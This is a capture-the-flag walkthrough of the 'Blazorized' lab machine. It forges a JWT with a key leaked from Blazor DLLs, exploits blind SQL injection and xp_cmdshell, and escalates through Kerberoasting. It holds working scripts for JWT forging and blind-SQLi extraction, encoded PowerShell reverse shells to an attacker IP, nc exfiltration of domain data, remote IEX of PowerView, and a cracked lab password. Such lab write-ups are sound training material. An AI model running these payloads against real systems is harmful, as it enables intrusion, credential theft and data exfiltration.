Blazorized
Recon
└─$ grep bla /etc/hosts
10.10.11.22 blazorized.htb admin.blazorized.htb api.blazorized.htb
HTTP (80)

Since the hosts file already lists several vhosts and DNS is in play, I first enumerated subdomains with ffuf (vhost fuzzing via the Host header):
└─$ domain="blazorized.htb"; ffuf -u "http://$domain" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fl 2
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://blazorized.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.blazorized.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response lines: 2
________________________________________________
admin [Status: 200, Size: 2037, Words: 149, Lines: 28, Duration: 160ms]
:: Progress: [19966/19966] :: Job [1/1] :: 428 req/sec :: Duration: [0:02:05] :: Errors: 0 ::
The Check for Updates page makes a request to the api subdomain.

In the API request we see an Authorization token even though we are not logged in. Nice, we have a superadmin session token.

Blazor DLLs
I tried using the token to log into the admin panel but had no luck. Looking at the traffic when visiting the admin subdomain, some odd requests are made: the backend seems to be .NET/C#. Yep, Blazor! From Wikipedia: Blazor is a free and open-source web framework that enables developers to create web user interfaces based on components, using C# and HTML. It is being developed by Microsoft, as part of the ASP.NET Core web app framework.

The app is built with WebAssembly and Blazor. On the first visit the site just says Loading, which is fine and nothing unusual, but if you're monitoring the traffic you see a lot of interesting things: the browser fetches the application's .NET DLLs, and those can be downloaded and decompiled.
Reference: Just Blazor Programming: Hack A Blazor WASM App

Copy the DLL endpoint links into endpoints_burp.log and download all of them (cut -f4 assumes Burp's tab-separated log export with the request path in the fourth column):
└─$ mkdir -p dlls && cd dlls; for dll in $(cut -f4 ../endpoints_burp.log); do curl -sSLO "http://blazorized.htb/$dll"; done
Leaked JWT Secret
We don't need the System.* or Microsoft.* DLLs, so we can skip them; what usually matters is the projectname.* assemblies. Decompiling the Helpers DLL (ILSpy/dnSpy) reveals how the JWTs are signed, and the key is right there:
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

The decompiled method that creates the super admin token (decompiler IL comments removed, explanatory comments added):
public static string GenerateSuperAdminJWT(long expirationDurationInSeconds = 60L)
{
    try
    {
        // Claims baked into the token: a fixed super admin e-mail and the Super_Admin role
        List<Claim> list = new List<Claim>
        {
            new Claim("http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress", superAdminEmailClaimValue),
            new Claim("http://schemas.microsoft.com/ws/2008/06/identity/claims/role", superAdminRoleClaimValue)
        };
        string text = issuer;                  // iss: http://api.blazorized.htb
        string text2 = adminDashboardAudience; // aud: http://admin.blazorized.htb
        // GetSigningCredentials() wraps the symmetric key leaked in this DLL (HS512)
        SigningCredentials signingCredentials = GetSigningCredentials();
        // Only a 60 second lifetime by default; irrelevant once we hold the key
        DateTime? dateTime = DateTime.UtcNow.AddSeconds(expirationDurationInSeconds);
        JwtSecurityToken val = new JwtSecurityToken(text, text2, (IEnumerable<Claim>)list, (DateTime?)null, dateTime, signingCredentials);
        return ((SecurityTokenHandler)new JwtSecurityTokenHandler()).WriteToken((SecurityToken)(object)val);
    }
    catch (Exception)
    {
        throw;
    }
}
Forge the token:

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJleHAiOjE3Mzk5MjUxMzAsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYWRtaW4uYmxhem9yaXplZC5odGIifQ.abD8mXBx16TPSoArZO3uZRX1aNmrqjdknvElGz0CD9iZmE9O9voA1DxE1AIRhrSLUelcyLjZswOh7oGac1SvLA
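To reproduce the forging step without a JWT library, here is an added example (not code from the original writeup). The token above is HS512, i.e. HMAC-SHA512 over base64url(header).base64url(payload), so with the key pulled out of Helpers.dll it can be minted in a few lines. The key value is a placeholder here; the claim types, issuer and audience are taken from the decompiled method and the decoded token, and verify_hs512 lets you confirm a candidate key against the token captured from the Check for Updates request before relying on it.

```python
import base64
import hashlib
import hmac
import json
import time

# Placeholder: substitute the symmetric key recovered from Helpers.dll (not reproduced here).
LEAKED_KEY = "REPLACE-WITH-KEY-FROM-Helpers.dll"

# Claim types and issuer/audience exactly as in GenerateSuperAdminJWT and the decoded token.
EMAIL_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"
ISSUER = "http://api.blazorized.htb"
AUDIENCE = "http://admin.blazorized.htb"


def b64url(data: bytes) -> str:
    """JWT segments are base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def forge_superadmin_jwt(key, email="superadmin@blazorized.htb", role="Super_Admin",
                         lifetime=3600, now=None):
    """Mint a token the admin dashboard accepts: same claims as the server's
    GenerateSuperAdminJWT, but with an expiry we control instead of 60 seconds."""
    now = int(time.time()) if now is None else now
    header = {"alg": "HS512", "typ": "JWT"}
    payload = {EMAIL_CLAIM: email, ROLE_CLAIM: role,
               "exp": now + lifetime, "iss": ISSUER, "aud": AUDIENCE}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    # HS512 = HMAC-SHA512 keyed with the leaked symmetric secret
    sig = hmac.new(key.encode(), signing_input.encode(), hashlib.sha512).digest()
    return signing_input + "." + b64url(sig)


def verify_hs512(token, key):
    """Check a token against a candidate key, e.g. the API's own token from the
    Check for Updates request, to confirm the key from the DLL is the live one."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(key.encode(), f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha512).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def decode_unverified(token):
    """Header and claims without a signature check (what jwt.io shows)."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    token = forge_superadmin_jwt(LEAKED_KEY)
    print(token)
    print(decode_unverified(token))
    # In the browser on admin.blazorized.htb: localStorage.setItem('jwt', token); then reload.
```

The token goes into localStorage under the key the admin app reads (found to be jwt later on this page); if verify_hs512 returns False for the captured API token, the key you extracted is not the one the API signs with.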
The admin subdomain first tries to authenticate with a JWT. There was a LocalStorage DLL among the downloaded assemblies, so it must read the token from browser localStorage. After a lot of fuzzing, jwt turned out to be the localStorage key it checks, so storing the forged token under that key and reloading logs us in.

Admin Panel

SQLi
Testing for SQL injection we only get a true/false difference in the response, so it's blind injection.
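What "true or false" buys you in practice, as an added example (not part of the original writeup): a boolean oracle is enough to pull data out one character at a time by binary search on ASCII(SUBSTRING(...)). The oracle below is a constructed stand-in that answers the way MSSQL would for a made-up database (the values are invented); against the real box you would replace it with a function that submits the payload to the injectable admin-panel field and returns True when the "true" page comes back. The injection prefix mirrors the uwu' ... -- - shape of the payload used on this page.

```python
import re

INJECTION_PREFIX = "uwu' AND "  # close the search string at the injection point
INJECTION_SUFFIX = "-- -"       # comment out the remainder of the original query


def build_payload(condition: str) -> str:
    """Wrap a T-SQL boolean condition into the injectable search term."""
    return f"{INJECTION_PREFIX}({condition}){INJECTION_SUFFIX}"


def extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` (e.g. SELECT SYSTEM_USER) character by
    character. Each position takes 7 requests (binary search over 0..127)."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"ASCII(SUBSTRING(({subquery}),{pos},1))>{mid}"
            if oracle(build_payload(cond)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # Past the end of the string: SUBSTRING returns '' and ASCII('') is NULL in
            # T-SQL, so every comparison is false and the search bottoms out at 0.
            break
        out.append(chr(lo))
    return "".join(out)


def make_simulated_oracle(db: dict):
    """Constructed stand-in for the vulnerable endpoint: parses the probe that extract()
    sends and answers as MSSQL would for a database holding the values in `db`."""
    probe = re.compile(r"ASCII\(SUBSTRING\(\((.+?)\),(\d+),1\)\)>(\d+)")

    def oracle(payload: str) -> bool:
        oracle.calls += 1
        m = probe.search(payload)
        if not m:
            return False
        value = db[m.group(1)]
        pos, threshold = int(m.group(2)), int(m.group(3))
        if pos > len(value):
            return False  # NULL > n is never true
        return ord(value[pos - 1]) > threshold

    oracle.calls = 0
    return oracle


# Constructed sample data, not real results from the target.
SAMPLE_DB = {"SELECT SYSTEM_USER": "nu_1055", "SELECT DB_NAME()": "Blazorized"}

if __name__ == "__main__":
    oracle = make_simulated_oracle(SAMPLE_DB)
    print(extract(oracle, "SELECT SYSTEM_USER"), "after", oracle.calls, "requests")
```

Against a real target the same loop works unchanged; only the oracle changes, and the request count (about 7 per character plus 7 to detect the end) tells you how noisy the extraction will be in the web logs.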


In the nmap scan we saw MSSQL in use. Stacked queries plus xp_cmdshell give command execution (xp_cmdshell is disabled by default and needs sysadmin rights to enable through sp_configure, so if the first call errors, that is why):
EXEC xp_cmdshell 'net user';
EXEC master.dbo.xp_cmdshell 'cmd.exe /c dir c:\';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
Verify that we can execute commands by injecting the standard PowerShell TCP reverse-shell one-liner, passed to powershell -e as UTF-16LE base64 (the same payload Villain generates below):

uwu'; EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwAyACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -- -
Reverse Shell (nu_1055)
PS C:\Windows\system32> whoami /all
User Name SID
================== =============================================
blazorized\nu_1055 S-1-5-21-2039403211-964143010-2924010611-1117
Group Name Type SID Attributes
=========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Normal_Users Group S-1-5-21-2039403211-964143010-2924010611-1133 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Kerberos support for Dynamic Access Control on this device has been disabled.
User.txt
PS C:\users\nu_1055> cat desktop/user.txt
107b582695337abf5d14a086491ef9cc
Privilege Escalation (RSA_4810)
└─$ villain -x 6502
┬ ┬ ┬ ┬ ┬ ┌─┐ ┬ ┌┐┌
└┐┌┘ │ │ │ ├─┤ │ │││
└┘ ┴ ┴─┘┴─┘┴ ┴ ┴ ┘└┘
Unleashed
[Meta] Created by t3l3machus
[Meta] Follow on Twitter, HTB, GitHub: @t3l3machus
[Meta] Thank you!
[Info] Initializing required services:
[0.0.0.0:6501]::Team Server
[0.0.0.0:4443]::Netcat TCP Multi-Handler
[0.0.0.0:6502]::HoaxShell Multi-Handler
[0.0.0.0:8888]::HTTP File Smuggler
[Info] Welcome! Type "help" to list available commands.
Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=tun0
Generating backdoor payload...
Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Object System.Net.Sockets.TCPClient('10.10.16.72',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -WindowStyle Hidden
Copied to clipboard!
[Shell] Backdoor session established on 10.10.11.22
Villain > backdoors
Session ID IP Address Shell Listener Stability Status
-------------------- ----------- -------------- -------- --------- ------
964cbe-c46f05-8d6a5a 10.10.11.22 powershell.exe netcat Stable Active

PS C:\users\public> upload /opt/scripts/enum/winPEASx64.exe C:\users\public\wp.exe
Success!
PS C:\users\public> .\wp.exe | tee-object -filepath wp.log



PS C:\users\nu_1055> systeminfo
Host Name: DC1
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA656
Original Install Date: 1/8/2024, 1:09:13 PM
System Boot Time: 7/2/2024, 5:37:39 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 826 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 1,064 MB
Virtual Memory: In Use: 3,735 MB
Page File Location(s): C:\pagefile.sys
Domain: blazorized.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.22
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\windows\panther> cat unattend.xml
...
<component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<UserAccounts>
<AdministratorPassword>*SENSITIVE*DATA*DELETED*</AdministratorPassword>
</UserAccounts>
...
The web.config files also had nothing useful.
We are part of a custom group, so it's worth enumerating groups and ACLs with SharpHound.
BLAZORIZED\nu_1055> upload ./SharpHound.exe SH.exe
BLAZORIZED\nu_1055> .\SH.exe -c all --zipfilename sh.zip --zippassword 'Password123$'
BLAZORIZED\nu_1055> ls
Directory: C:\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/6/2021 3:38 PM Documents
d-r--- 9/15/2018 2:19 AM Downloads
d----- 7/2/2024 11:23 AM loot
d-r--- 9/15/2018 2:19 AM Music
d-r--- 9/15/2018 2:19 AM Pictures
d-r--- 9/15/2018 2:19 AM Videos
-a---- 7/2/2024 11:37 AM 23459 20240702113738_sh.zip
-a---- 7/2/2024 11:34 AM 1342464 SH.exe
-a---- 7/2/2024 9:37 AM 2387456 wp.exe
-a---- 7/2/2024 9:41 AM 598234 wp.log
-a---- 7/2/2024 11:37 AM 46015 ZWY3N2UxMzgtNTg0Zi00OTg1LTllNmQtMDg1Yjc5ZmYzNWMz.bin
BLAZORIZED\nu_1055> upload nc64.exe nc.exe
BLAZORIZED\nu_1055> cat 20240702113738_sh.zip | ./nc.exe 10.10.16.72 4444
Exfiltrate the zip

As I thought, the exfiltration was not successful: piping the zip straight into nc from PowerShell mangles it, because cat/Get-Content and the pipeline pass the file through as text rather than raw bytes. To work around this, encode the file as base64 first; the easiest way is certutil.exe:
BLAZORIZED\nu_1055> certutil.exe -encode 20240702115628_sh.zip sh.zip.base64
Input Length = 22554
Output Length = 31068
CertUtil: -encode command completed successfully.
BLAZORIZED\nu_1055> cat sh.zip.base64 | ./nc.exe 10.10.16.72 4444
---
└─$ cat loot.zip.base64 | base64 -di > loot.zip
└─$ file loot.zip
loot.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
└─$ unzip loot.zip
Archive: loot.zip
inflating: 20240702115628_computers.json
inflating: 20240702115628_users.json
inflating: 20240702115628_groups.json
inflating: 20240702115628_containers.json
inflating: 20240702115628_domains.json
inflating: 20240702115628_gpos.json
inflating: 20240702115628_ous.json
Note: certutil.exe is a certificate tool, so its -encode output is wrapped in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines; remove the first and last line to get valid base64 (base64 -i only skips non-alphabet characters, and the letters in those header lines would be decoded as data).
Note: I removed the zip password for the base64 run.
Unfortunately the legacy BloodHound GUI cannot ingest the collected data because SharpHound 5.x output is not compatible with it (BloodHoundAD issue #700, "Zip File not loading"). BloodHound Community Edition is required: https://github.com/SpecterOps/BloodHound
sudo apt install docker-compose
curl -L https://ghst.ly/getbhce | docker-compose -f - up # docker-compose (With dash on kali)
BloodHound
The owned user is a member of the following groups (from BloodHound). Under Outbound Object Control we have WriteSPN on the RSA_4810 account:
The user NU_1055@BLAZORIZED.HTB has the ability to write to the "serviceprincipalname" attribute to the user RSA_4810@BLAZORIZED.HTB.

Clicking on the WriteSPN edge gives the abuse details: with write access to an account's servicePrincipalName we can add an SPN of our choosing, request a service ticket for it, and crack the ticket offline (targeted Kerberoasting).
Reference: The Hacker Recipes > DACL abuse > BloodHound ACE edges > Targeted Kerberoasting

BLAZORIZED\nu_1055> IEX(IWR 10.10.16.72/PowerView.ps1 -UseBasicParsing)
BLAZORIZED\nu_1055> Get-DomainUser 'RSA_4810' | Select serviceprincipalname
serviceprincipalname
--------------------
blazorized.htb/admin
BLAZORIZED\nu_1055> Set-DomainObject -Identity 'RSA_4810' -Set @{serviceprincipalname='daddy/issues'}
BLAZORIZED\nu_1055> $User = Get-DomainUser 'RSA_4810'
BLAZORIZED\nu_1055> $User | Get-DomainSPNTicket | fl
SamAccountName : RSA_4810
DistinguishedName : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
ServicePrincipalName : daddy/issues
TicketByteHexStream :
Hash : $krb5tgs$23$*RSA_4810$blazorized.htb$daddy/issues*$1461290852DF10FFC82979557447F05D$FD1FBC62FF7E
832711A0234D5F4770C5B0A2F2E2C794756830E2C38395AE315B83CC2E1F93780C720CB9A5D6DFEDFFA00EB1153E8408
0AD3D8B6CCF256615B7FCB8F690F6167017EB566377523CE831EF570AA625CEB6E219BE521A842F1A0F11B56363BEA4B
64C7F811213432BA1D90E5242E49BB51FB565CED56BB9C1BFE2FB3F717E60CB8C6AA178C23310A2278BF6EEB56797960
343B99A7E9332A4A9DAB60086091A0EBF9EB9EC9826A77121FCAE45B854CA7C842532AD932CB2AD3679563D32B30E714
3A65EBB76CB933A6CBB56657F9E8C7676349611F93DB5EA24F177ADDD1BFC24757674CF44890D172121AB6B46EA71757
CEA570A391427741AABE1CD598BBD489E0FB570E0D22F324E1A8B48DFC648C2886707A97C96894E7F799EB588D5B75F9
A3CF130E85086B3C514C2BFB33183DDF9D43AFA378E6A280C9AA14FC45F2D0A28250CD3C090BF4924F408B940C675EA0
6F8B5F7671D1A7798F8AE53EC57564D71EFCDF9EA03820550EE755E8FF80A83DDD901238A36BFE19DD04452365E91412
B2EADAEB5F706B58AE51ACF59A9BDC7FBDEE8EAB170E97468F64D175559F54DB7AB4026854A122E5E813B10160C0FD59
E3EA65EE9F3DFFABF71F4212A9C96A2A0EB6987B589D6119A1DC6D31A1C663D3D86B78CD921BCA55B1BEA821C0C8D03F
2F9E084D8AA855474C758C6F67B5BE7B469A0086196EEA4B8685B489A9A1933B268471CCC966AAF7480EA62330985589
5E20EEBBDF0362A23FDCEA926C45A238DBF92473E5EDE7FD24D391C1124316216101ADFA185DF64A900CBD1812749BFC
FB64287D5A76E7AF24500DE5F95FD05416307BD17306912A9E5CD3DE857EFD2557EFBE8E6AEFE0462355A94BD934FB76
63629A8F9C11F0F163CDE8854802DB24FBF6BD3C57D1CC5DE0243679B4AB1C4F782C266E5E7C1BAF20388A9D066BDED6
F5B5107774A8599BE4936AE5F5892F4F6B745B333D2E10CA180686F3111C59FC0CA226AE715299A7875CEFA5107E8460
6961EA247769A93A330A66617B2F7C7298C9E1F4C7C4B018AFB3AD551BCA6964C52BEB4A436B448B1B0A4A23FECDFA0E
BA30F40F223ABF12FAF58941D6F859AD7BB01316F75BAD06D313ACAC11FB147B96D50A6643060FFCAD6DEC655503B2FD
C012728FBE0D1D04158A29F40D82C6AD7B48534C11052DBFC381478A9855BB16C3F9B2D66E4788A3365DBDBC3C3C8410
29CB8C7D47EFD832BB28AF2B85F0651010169A5734D370C70EE6DB52ABB11AD16D8A6F02B276A21D2CF3DC00AD62D65E
CC8C1150EE146D214BAB803BBF376239702FA9F6E8D9EB0EB1E38DD5C934AC6B4BD9DC1089631468CBE0B7234051E4AA
C5C8AB3714122A73E94D66B5CB720F7ABA84B73404DEDDB88E00FF3F326F06F3168E10B49B968E7C1A235F0C3F0B58BD
0C6A9CB4648F21C00B5BB7CA94BC3FBFC67EC6EE16F4A818B8C6C0D53FFF292B00034F1F99DA78B4D8C548DD07E84754
B125E9D5015490201DF68400BA56E5CD23FC8A536BB3275B67E15075CB4DEA72C7EA185AB76695C7EC27CBF5E1B7DEB5
5C7B3ECBC19D31C74AE3ACD3831C45AB015E2C67DF6FB86FE07DF55C9C305729B676410A4133A152809872FF208E39FD
80E531F82ED3E3635DB598E468F5EC10ACBE2CCFEAA51E845C896749980CF19F0A896B8FD6FE27B7E9E372C3CC088258
5D7333572D66A30B0118D967CBBE8421947891422C56D13F389FEE5EA4B5CA59B1D30EC3A9C879411BCEEEE79BFD2638
0BFA
BLAZORIZED\nu_1055> Set-DomainObject -Identity 'RSA_4810' -Clear serviceprincipalname
Note that -Clear also drops the SPN the account originally had (blazorized.htb/admin); to leave the object as found, set it back to that value instead of clearing.
➜ .\hashcat.exe --show hashes
...
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
...
➜ .\hashcat.exe -a 0 -m 13100 .\hashes .\rockyou.txt
...
$krb5tgs$23$*RSA_4810$blazorized.htb$daddy/issues*$1461290852df10ffc82979557447f05d$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:(Ni7856Do9854Ki05Ng0005 #)
...
Creds:
RSA_4810:(Ni7856Do9854Ki05Ng0005 #)
Privilege Escalation (SSA_6010)
└─$ evil-winrm -i 10.10.11.22 -u 'RSA_4810' -p '(Ni7856Do9854Ki05Ng0005 #)'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami /all
User Name SID
=================== =============================================
blazorized\rsa_4810 S-1-5-21-2039403211-964143010-2924010611-1107
Group Name Type SID Attributes
=========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Remote_Support_Administrators Group S-1-5-21-2039403211-964143010-2924010611-1115 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\users\public> .\SH.exe -c all --zipfilename sh.zip --zippassword 'Password123$'
*Evil-WinRM* PS C:\users\public> download 20240702141848_sh.zip


BloodHound doesn't show any further privesc path from RSA_4810. Upload PowerView and explore the domain manually.
*Evil-WinRM* PS C:\users\public> IEX(IWR 10.10.16.72/PowerView.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\users\public> Get-DomainUser | Select displayname, logoncount
displayname logoncount
----------- ----------
565
0
0
RSA_4810 24
NU_1056 0
0
NU_1058 0
NU_1055 199
RSA_4811 2
RSA_4812 0
RSA_4813 0
RSA_4814 0
SSA_6010 3984
SSA_6011 0
SSA_6012 0
SSA_6013 0
LSA_3211 0
LSA_3212 0
LSA_3213 0
After invoking Get-DomainUser and looking over the result, one field stands out: logoncount. 3984 logons looks like an automated task that keeps logging in as SSA_6010, which matters because anything set as that account's logon script runs in its context.
*Evil-WinRM* PS C:\users\public> Get-DomainUser -Identity SSA_6010
logoncount : 3988
badpasswordtime : 6/19/2024 9:58:18 AM
distinguishedname : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : SSA_6010
lastlogontimestamp : 6/27/2024 7:18:21 AM
userprincipalname : SSA_6010@blazorized.htb
name : SSA_6010
objectsid : S-1-5-21-2039403211-964143010-2924010611-1124
samaccountname : SSA_6010
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/2/2024 6:40:52 PM
instancetype : 4
usncreated : 29007
objectguid : 8bf3166b-e716-4f91-946c-174e1fb433ed
lastlogoff : 12/31/1600 6:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {6/19/2024 1:24:50 PM, 6/14/2024 12:40:41 PM, 6/14/2024 12:40:28 PM, 6/14/2024 12:38:20 PM...}
memberof : {CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon : 7/2/2024 3:06:09 PM
cn : SSA_6010
badpwdcount : 0
scriptpath : \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030
